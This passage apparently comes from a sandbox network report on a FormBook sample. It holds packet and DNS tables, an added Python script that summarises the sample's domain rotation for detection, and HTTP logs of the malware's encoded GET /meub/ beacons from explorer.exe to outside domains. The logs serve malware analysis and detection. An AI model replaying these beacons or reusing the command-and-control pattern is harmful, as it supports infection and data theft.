May 12, 2021 10:51:34.724829912 CEST  80           49724      34.102.136.180  192.168.2.4
May 12, 2021 10:51:34.817344904 CEST  80           49724      34.102.136.180  192.168.2.4
May 12, 2021 10:51:34.817398071 CEST  80           49724      34.102.136.180  192.168.2.4
May 12, 2021 10:51:34.817590952 CEST  49724        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:34.817627907 CEST  49724        80         192.168.2.4     34.102.136.180
May 12, 2021 10:51:34.861659050 CEST  80           49724      34.102.136.180  192.168.2.4
May 12, 2021 10:51:40.080795050 CEST  49725        80         192.168.2.4     107.164.93.172
May 12, 2021 10:51:40.272236109 CEST  80           49725      107.164.93.172  192.168.2.4
May 12, 2021 10:51:40.272469044 CEST  49725        80         192.168.2.4     107.164.93.172
May 12, 2021 10:51:41.394385099 CEST  49725        80         192.168.2.4     107.164.93.172
May 12, 2021 10:51:41.585478067 CEST  80           49725      107.164.93.172  192.168.2.4
May 12, 2021 10:51:41.920188904 CEST  49725        80         192.168.2.4     107.164.93.172
May 12, 2021 10:51:42.150350094 CEST  80           49725      107.164.93.172  192.168.2.4
May 12, 2021 10:51:43.344671011 CEST  80           49725      107.164.93.172  192.168.2.4
May 12, 2021 10:51:43.344873905 CEST  49725        80         192.168.2.4     107.164.93.172
May 12, 2021 10:51:47.151396990 CEST  49726        80         192.168.2.4     104.164.26.246
May 12, 2021 10:51:47.346937895 CEST  80           49726      104.164.26.246  192.168.2.4
May 12, 2021 10:51:47.347071886 CEST  49726        80         192.168.2.4     104.164.26.246
May 12, 2021 10:51:47.347271919 CEST  49726        80         192.168.2.4     104.164.26.246
May 12, 2021 10:51:47.739093065 CEST  80           49726      104.164.26.246  192.168.2.4
May 12, 2021 10:51:47.849630117 CEST  49726        80         192.168.2.4     104.164.26.246
May 12, 2021 10:51:47.953749895 CEST  80           49726      104.164.26.246  192.168.2.4
May 12, 2021 10:51:47.953820944 CEST  49726        80         192.168.2.4     104.164.26.246
May 12, 2021 10:51:48.043176889 CEST  80           49726      104.164.26.246  192.168.2.4
May 12, 2021 10:51:48.043261051 CEST  49726        80         192.168.2.4     104.164.26.246
May 12, 2021 10:51:58.117974997 CEST  49727        80         192.168.2.4     198.54.117.216
May 12, 2021 10:51:58.312294960 CEST  80           49727      198.54.117.216  192.168.2.4
May 12, 2021 10:51:58.312581062 CEST  49727        80         192.168.2.4     198.54.117.216
May 12, 2021 10:51:58.312855959 CEST  49727        80         192.168.2.4     198.54.117.216
May 12, 2021 10:51:58.507247925 CEST  80           49727      198.54.117.216  192.168.2.4
May 12, 2021 10:51:58.507266998 CEST  80           49727      198.54.117.216  192.168.2.4
May 12, 2021 10:52:08.960374117 CEST  49728        80         192.168.2.4     18.219.49.238
May 12, 2021 10:52:09.097378016 CEST  80           49728      18.219.49.238   192.168.2.4
May 12, 2021 10:52:09.097668886 CEST  49728        80         192.168.2.4     18.219.49.238
May 12, 2021 10:52:09.098130941 CEST  49728        80         192.168.2.4     18.219.49.238
May 12, 2021 10:52:09.267746925 CEST  80           49728      18.219.49.238   192.168.2.4
May 12, 2021 10:52:09.267822027 CEST  80           49728      18.219.49.238   192.168.2.4
May 12, 2021 10:52:09.268290043 CEST  49728        80         192.168.2.4     18.219.49.238
May 12, 2021 10:52:09.268402100 CEST  49728        80         192.168.2.4     18.219.49.238
May 12, 2021 10:52:09.405317068 CEST  80           49728      18.219.49.238   192.168.2.4
May 12, 2021 10:52:14.497379065 CEST  49729        80         192.168.2.4     162.241.62.63
May 12, 2021 10:52:14.658348083 CEST  80           49729      162.241.62.63   192.168.2.4
May 12, 2021 10:52:14.662015915 CEST  49729        80         192.168.2.4     162.241.62.63
May 12, 2021 10:52:14.662301064 CEST  49729        80         192.168.2.4     162.241.62.63
May 12, 2021 10:52:14.824084997 CEST  80           49729      162.241.62.63   192.168.2.4
May 12, 2021 10:52:14.828128099 CEST  80           49729      162.241.62.63   192.168.2.4
May 12, 2021 10:52:14.828155041 CEST  80           49729      162.241.62.63   192.168.2.4
May 12, 2021 10:52:14.828591108 CEST  49729        80         192.168.2.4     162.241.62.63
May 12, 2021 10:52:14.829040051 CEST  49729        80         192.168.2.4     162.241.62.63
May 12, 2021 10:52:14.991287947 CEST  80           49729      162.241.62.63   192.168.2.4
May 12, 2021 10:52:19.905034065 CEST  49730        80         192.168.2.4     34.102.136.180
May 12, 2021 10:52:19.946204901 CEST  80           49730      34.102.136.180  192.168.2.4
May 12, 2021 10:52:19.946568966 CEST  49730        80         192.168.2.4     34.102.136.180
May 12, 2021 10:52:19.946628094 CEST  49730        80         192.168.2.4     34.102.136.180
May 12, 2021 10:52:19.987349987 CEST  80           49730      34.102.136.180  192.168.2.4
May 12, 2021 10:52:20.083381891 CEST  80           49730      34.102.136.180  192.168.2.4
May 12, 2021 10:52:20.083417892 CEST  80           49730      34.102.136.180  192.168.2.4
May 12, 2021 10:52:20.083604097 CEST  49730        80         192.168.2.4     34.102.136.180
May 12, 2021 10:52:20.083626986 CEST  49730        80         192.168.2.4     34.102.136.180
May 12, 2021 10:52:20.124206066 CEST  80           49730      34.102.136.180  192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2021 10:50:06.187598944 CEST | 56483 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:06.236371040 CEST | 53 | 56483 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:07.473145962 CEST | 51025 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:07.522317886 CEST | 53 | 51025 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:10.386281967 CEST | 61516 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:10.435064077 CEST | 53 | 61516 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:12.766177893 CEST | 49182 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:12.814867020 CEST | 53 | 49182 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:13.783512115 CEST | 59920 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:13.832799911 CEST | 53 | 59920 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:14.972019911 CEST | 57458 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:15.020659924 CEST | 53 | 57458 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:18.660664082 CEST | 50579 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:18.709949017 CEST | 53 | 50579 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:20.651276112 CEST | 51703 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:20.700069904 CEST | 53 | 51703 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:37.368491888 CEST | 65248 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:37.420420885 CEST | 53 | 65248 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:38.520031929 CEST | 53723 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:38.573285103 CEST | 53 | 53723 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:39.452804089 CEST | 64646 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:39.504393101 CEST | 53 | 64646 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:43.248534918 CEST | 65298 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:43.297564983 CEST | 53 | 65298 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:45.461976051 CEST | 59123 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:45.515486956 CEST | 53 | 59123 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:46.388328075 CEST | 54531 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:46.436871052 CEST | 53 | 54531 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:56.997181892 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:57.047228098 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:57.931051970 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:57.981679916 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:50:59.369159937 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:50:59.417979002 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:51:00.356456041 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:51:00.408096075 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:51:07.619672060 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:51:07.677623987 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:51:12.696763039 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:51:13.572402000 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:51:18.585570097 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:51:18.654793024 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:51:23.881491899 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:51:24.033982992 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:51:29.321614027 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:51:29.383584023 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:51:34.574343920 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:51:34.637315035 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:51:39.858114958 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:51:40.059561968 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:51:46.934683084 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:51:47.149091959 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:51:52.870204926 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:51:53.016850948 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:51:58.051847935 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:51:58.115525007 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:52:08.547878981 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:52:08.957885027 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:52:14.309987068 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:52:14.496155024 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
May 12, 2021 10:52:19.838093996 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 10:52:19.904480934 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 12, 2021 10:51:07.619672060 CEST | 192.168.2.4 | 8.8.8.8 | 0x590f | Standard query (0) | www.paperplaneexplorer.com | A (IP address) | IN (0x0001)
May 12, 2021 10:51:12.696763039 CEST | 192.168.2.4 | 8.8.8.8 | 0xee68 | Standard query (0) | www.xn--80aasvjfhla.xn--p1acf | A (IP address) | IN (0x0001)
May 12, 2021 10:51:18.585570097 CEST | 192.168.2.4 | 8.8.8.8 | 0xf953 | Standard query (0) | www.comicstattoosnguns.com | A (IP address) | IN (0x0001)
May 12, 2021 10:51:23.881491899 CEST | 192.168.2.4 | 8.8.8.8 | 0x32ba | Standard query (0) | www.goeseo.com | A (IP address) | IN (0x0001)
May 12, 2021 10:51:29.321614027 CEST | 192.168.2.4 | 8.8.8.8 | 0x21ae | Standard query (0) | www.shadyshainarae.com | A (IP address) | IN (0x0001)
May 12, 2021 10:51:34.574343920 CEST | 192.168.2.4 | 8.8.8.8 | 0x71fb | Standard query (0) | www.thefrankversion.com | A (IP address) | IN (0x0001)
May 12, 2021 10:51:39.858114958 CEST | 192.168.2.4 | 8.8.8.8 | 0xd9e3 | Standard query (0) | www.tjanyancha.com | A (IP address) | IN (0x0001)
May 12, 2021 10:51:46.934683084 CEST | 192.168.2.4 | 8.8.8.8 | 0xbd5f | Standard query (0) | www.dmowang.com | A (IP address) | IN (0x0001)
May 12, 2021 10:51:52.870204926 CEST | 192.168.2.4 | 8.8.8.8 | 0xff09 | Standard query (0) | www.usapersonalshopper.com | A (IP address) | IN (0x0001)
May 12, 2021 10:51:58.051847935 CEST | 192.168.2.4 | 8.8.8.8 | 0x879a | Standard query (0) | www.pocopage.com | A (IP address) | IN (0x0001)
May 12, 2021 10:52:08.547878981 CEST | 192.168.2.4 | 8.8.8.8 | 0xccfb | Standard query (0) | www.goodcreditcardshome.info | A (IP address) | IN (0x0001)
May 12, 2021 10:52:14.309987068 CEST | 192.168.2.4 | 8.8.8.8 | 0x8eb7 | Standard query (0) | www.pasteleriaruth.com | A (IP address) | IN (0x0001)
May 12, 2021 10:52:19.838093996 CEST | 192.168.2.4 | 8.8.8.8 | 0x2f41 | Standard query (0) | www.amesshop.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 12, 2021 10:51:07.677623987 CEST | 8.8.8.8 | 192.168.2.4 | 0x590f | Name error (3) | www.paperplaneexplorer.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 10:51:13.572402000 CEST | 8.8.8.8 | 192.168.2.4 | 0xee68 | Server failure (2) | www.xn--80aasvjfhla.xn--p1acf | none | none | A (IP address) | IN (0x0001)
May 12, 2021 10:51:18.654793024 CEST | 8.8.8.8 | 192.168.2.4 | 0xf953 | No error (0) | www.comicstattoosnguns.com | comicstattoosnguns.com | | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 10:51:18.654793024 CEST | 8.8.8.8 | 192.168.2.4 | 0xf953 | No error (0) | comicstattoosnguns.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
May 12, 2021 10:51:24.033982992 CEST | 8.8.8.8 | 192.168.2.4 | 0x32ba | No error (0) | www.goeseo.com | | 66.96.162.130 | A (IP address) | IN (0x0001)
May 12, 2021 10:51:29.383584023 CEST | 8.8.8.8 | 192.168.2.4 | 0x21ae | No error (0) | www.shadyshainarae.com | shadyshainarae.com | | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 10:51:29.383584023 CEST | 8.8.8.8 | 192.168.2.4 | 0x21ae | No error (0) | shadyshainarae.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
May 12, 2021 10:51:34.637315035 CEST | 8.8.8.8 | 192.168.2.4 | 0x71fb | No error (0) | www.thefrankversion.com | thefrankversion.com | | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 10:51:34.637315035 CEST | 8.8.8.8 | 192.168.2.4 | 0x71fb | No error (0) | thefrankversion.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
May 12, 2021 10:51:40.059561968 CEST | 8.8.8.8 | 192.168.2.4 | 0xd9e3 | No error (0) | www.tjanyancha.com | | 107.164.93.172 | A (IP address) | IN (0x0001)
May 12, 2021 10:51:47.149091959 CEST | 8.8.8.8 | 192.168.2.4 | 0xbd5f | No error (0) | www.dmowang.com | | 104.164.26.246 | A (IP address) | IN (0x0001)
May 12, 2021 10:51:53.016850948 CEST | 8.8.8.8 | 192.168.2.4 | 0xff09 | Name error (3) | www.usapersonalshopper.com | none | none | A (IP address) | IN (0x0001)
May 12, 2021 10:51:58.115525007 CEST | 8.8.8.8 | 192.168.2.4 | 0x879a | No error (0) | www.pocopage.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 10:51:58.115525007 CEST | 8.8.8.8 | 192.168.2.4 | 0x879a | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
May 12, 2021 10:51:58.115525007 CEST | 8.8.8.8 | 192.168.2.4 | 0x879a | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
May 12, 2021 10:51:58.115525007 CEST | 8.8.8.8 | 192.168.2.4 | 0x879a | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
May 12, 2021 10:51:58.115525007 CEST | 8.8.8.8 | 192.168.2.4 | 0x879a | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
May 12, 2021 10:51:58.115525007 CEST | 8.8.8.8 | 192.168.2.4 | 0x879a | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)
May 12, 2021 10:51:58.115525007 CEST | 8.8.8.8 | 192.168.2.4 | 0x879a | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
May 12, 2021 10:51:58.115525007 CEST | 8.8.8.8 | 192.168.2.4 | 0x879a | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
May 12, 2021 10:52:08.957885027 CEST | 8.8.8.8 | 192.168.2.4 | 0xccfb | No error (0) | www.goodcreditcardshome.info | | 18.219.49.238 | A (IP address) | IN (0x0001)
May 12, 2021 10:52:08.957885027 CEST | 8.8.8.8 | 192.168.2.4 | 0xccfb | No error (0) | www.goodcreditcardshome.info | | 18.218.104.7 | A (IP address) | IN (0x0001)
May 12, 2021 10:52:14.496155024 CEST | 8.8.8.8 | 192.168.2.4 | 0x8eb7 | No error (0) | www.pasteleriaruth.com | pasteleriaruth.com | | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 10:52:14.496155024 CEST | 8.8.8.8 | 192.168.2.4 | 0x8eb7 | No error (0) | pasteleriaruth.com | | 162.241.62.63 | A (IP address) | IN (0x0001)
May 12, 2021 10:52:19.904480934 CEST | 8.8.8.8 | 192.168.2.4 | 0x2f41 | No error (0) | www.amesshop.com | amesshop.com | | CNAME (Canonical name) | IN (0x0001)
May 12, 2021 10:52:19.904480934 CEST | 8.8.8.8 | 192.168.2.4 | 0x2f41 | No error (0) | amesshop.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
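
The thirteen queries and their answers above record the sample walking a list of names, one every few seconds: some resolve, two return NXDOMAIN, one SERVFAIL, one lands on a registrar parking page, and four distinct names resolve to the same address, 34.102.136.180. The Python below is an added example and is not part of the Joe Sandbox report or of the sample. It joins the two tables on transaction ID (which is what maps an A record for a CNAME target back to the name that was actually queried) and summarises the rotation: breadth, rhythm and address overlap. The records are transcribed from the tables above; the pipe-delimited layout, the function names and the shape of the summary are this example's own.

```python
"""Join the report's DNS queries to their answers and summarise the
domain rotation.  Added example, not part of the Joe Sandbox report.
Records are transcribed from the DNS Queries / DNS Answers tables;
the pipe-delimited layout and the function names are this example's own."""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# timestamp | transaction ID | queried name
DNS_QUERIES = """\
May 12, 2021 10:51:07.619672060 CEST|0x590f|www.paperplaneexplorer.com
May 12, 2021 10:51:12.696763039 CEST|0xee68|www.xn--80aasvjfhla.xn--p1acf
May 12, 2021 10:51:18.585570097 CEST|0xf953|www.comicstattoosnguns.com
May 12, 2021 10:51:23.881491899 CEST|0x32ba|www.goeseo.com
May 12, 2021 10:51:29.321614027 CEST|0x21ae|www.shadyshainarae.com
May 12, 2021 10:51:34.574343920 CEST|0x71fb|www.thefrankversion.com
May 12, 2021 10:51:39.858114958 CEST|0xd9e3|www.tjanyancha.com
May 12, 2021 10:51:46.934683084 CEST|0xbd5f|www.dmowang.com
May 12, 2021 10:51:52.870204926 CEST|0xff09|www.usapersonalshopper.com
May 12, 2021 10:51:58.051847935 CEST|0x879a|www.pocopage.com
May 12, 2021 10:52:08.547878981 CEST|0xccfb|www.goodcreditcardshome.info
May 12, 2021 10:52:14.309987068 CEST|0x8eb7|www.pasteleriaruth.com
May 12, 2021 10:52:19.838093996 CEST|0x2f41|www.amesshop.com
"""
# transaction ID | reply code | name | CNAME | address  (empty field = not present)
DNS_ANSWERS = """\
0x590f|3|www.paperplaneexplorer.com||
0xee68|2|www.xn--80aasvjfhla.xn--p1acf||
0xf953|0|www.comicstattoosnguns.com|comicstattoosnguns.com|
0xf953|0|comicstattoosnguns.com||34.102.136.180
0x32ba|0|www.goeseo.com||66.96.162.130
0x21ae|0|www.shadyshainarae.com|shadyshainarae.com|
0x21ae|0|shadyshainarae.com||34.102.136.180
0x71fb|0|www.thefrankversion.com|thefrankversion.com|
0x71fb|0|thefrankversion.com||34.102.136.180
0xd9e3|0|www.tjanyancha.com||107.164.93.172
0xbd5f|0|www.dmowang.com||104.164.26.246
0xff09|3|www.usapersonalshopper.com||
0x879a|0|www.pocopage.com|parkingpage.namecheap.com|
0x879a|0|parkingpage.namecheap.com||198.54.117.216
0x879a|0|parkingpage.namecheap.com||198.54.117.210
0x879a|0|parkingpage.namecheap.com||198.54.117.218
0x879a|0|parkingpage.namecheap.com||198.54.117.215
0x879a|0|parkingpage.namecheap.com||198.54.117.211
0x879a|0|parkingpage.namecheap.com||198.54.117.212
0x879a|0|parkingpage.namecheap.com||198.54.117.217
0xccfb|0|www.goodcreditcardshome.info||18.219.49.238
0xccfb|0|www.goodcreditcardshome.info||18.218.104.7
0x8eb7|0|www.pasteleriaruth.com|pasteleriaruth.com|
0x8eb7|0|pasteleriaruth.com||162.241.62.63
0x2f41|0|www.amesshop.com|amesshop.com|
0x2f41|0|amesshop.com||34.102.136.180
"""
RCODES = {"0": "NOERROR", "2": "SERVFAIL", "3": "NXDOMAIN"}


def parse_ts(ts):
    """'May 12, 2021 10:51:07.619672060 CEST' -> seconds as float; the nanosecond
    field is kept and the zone name is ignored because only differences are used."""
    m = re.match(r"(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d+) \w+$", ts)
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S").replace(tzinfo=timezone.utc)
    return base.timestamp() + int(m.group(2)) / 10 ** len(m.group(2))


def correlate(queries=DNS_QUERIES, answers=DNS_ANSWERS):
    """One record per query: time, queried name, reply code, A addresses it got.
    Joining on transaction ID attributes A records for CNAME targets to the query."""
    rcode, addrs = {}, defaultdict(set)
    for line in answers.strip().splitlines():
        tid, code, _name, _cname, addr = line.split("|")
        rcode[tid] = RCODES.get(code, code)
        if addr:
            addrs[tid].add(addr)
    results = []
    for line in queries.strip().splitlines():
        ts, tid, name = line.split("|")
        results.append({"t": parse_ts(ts), "domain": name,
                        "rcode": rcode.get(tid, "NO ANSWER"),
                        "addrs": sorted(addrs.get(tid, ()))})
    return results


def rotation_summary(results):
    """Breadth, rhythm and address overlap of the query sequence."""
    gaps = [b["t"] - a["t"] for a, b in zip(results, results[1:])]
    by_ip, rcodes = defaultdict(set), defaultdict(int)
    for r in results:
        rcodes[r["rcode"]] += 1
        for ip in r["addrs"]:
            by_ip[ip].add(r["domain"])
    return {"domains": len({r["domain"] for r in results}),
            "median_gap_s": statistics.median(gaps),
            "rcodes": dict(rcodes),
            # addresses that more than one queried name resolved to
            "shared_ips": {ip: sorted(d) for ip, d in by_ip.items() if len(d) > 1}}


if __name__ == "__main__":
    print(rotation_summary(correlate()))
```

On this data the summary reports 13 domains, a median spacing of about 5.5 s between queries, 10 NOERROR / 2 NXDOMAIN / 1 SERVFAIL, and 34.102.136.180 shared by www.comicstattoosnguns.com, www.shadyshainarae.com, www.thefrankversion.com and www.amesshop.com. The same join works on any resolver log that exposes transaction IDs; the signal worth alerting on is the rhythm and the breadth of the sequence from one host, not any single name, since FormBook is known to mix decoy domains into the list it walks and most of the names here return errors or parking pages.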

HTTP Request Dependency Graph

• www.comicstattoosnguns.com
• www.goeseo.com
• www.shadyshainarae.com
• www.thefrankversion.com
• www.tjanyancha.com
• www.dmowang.com
• www.pocopage.com
• www.goodcreditcardshome.info
• www.pasteleriaruth.com
• www.amesshop.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49721 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
May 12, 2021 10:51:18.705996990 CEST | 221 | OUT | GET /meub/?6lt4=M6ATVT20FLj&ktI=QUeAVjOekbDfJHkoX1fEShfTueYawgYx/upvqY2KU2Y9ees5c1/xq3BWwCfJvPCdwXre HTTP/1.1
Host: www.comicstattoosnguns.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 10:51:18.844482899 CEST | 222 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 12 May 2021 08:51:18 GMT
Content-Type: text/html
Content-Length: 275
ETag: "609953da-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49722 | 66.96.162.130 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
May 12, 2021 10:51:24.162463903 CEST | 222 | OUT | GET /meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLj HTTP/1.1
Host: www.goeseo.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 10:51:24.313256979 CEST | 223 | IN | HTTP/1.1 404 Not Found
Date: Wed, 12 May 2021 08:51:24 GMT
Content-Type: text/html
Content-Length: 867
Connection: close
Server: Apache/2
Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
Accept-Ranges: bytes
Accept-Ranges: bytes
Age: 0
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 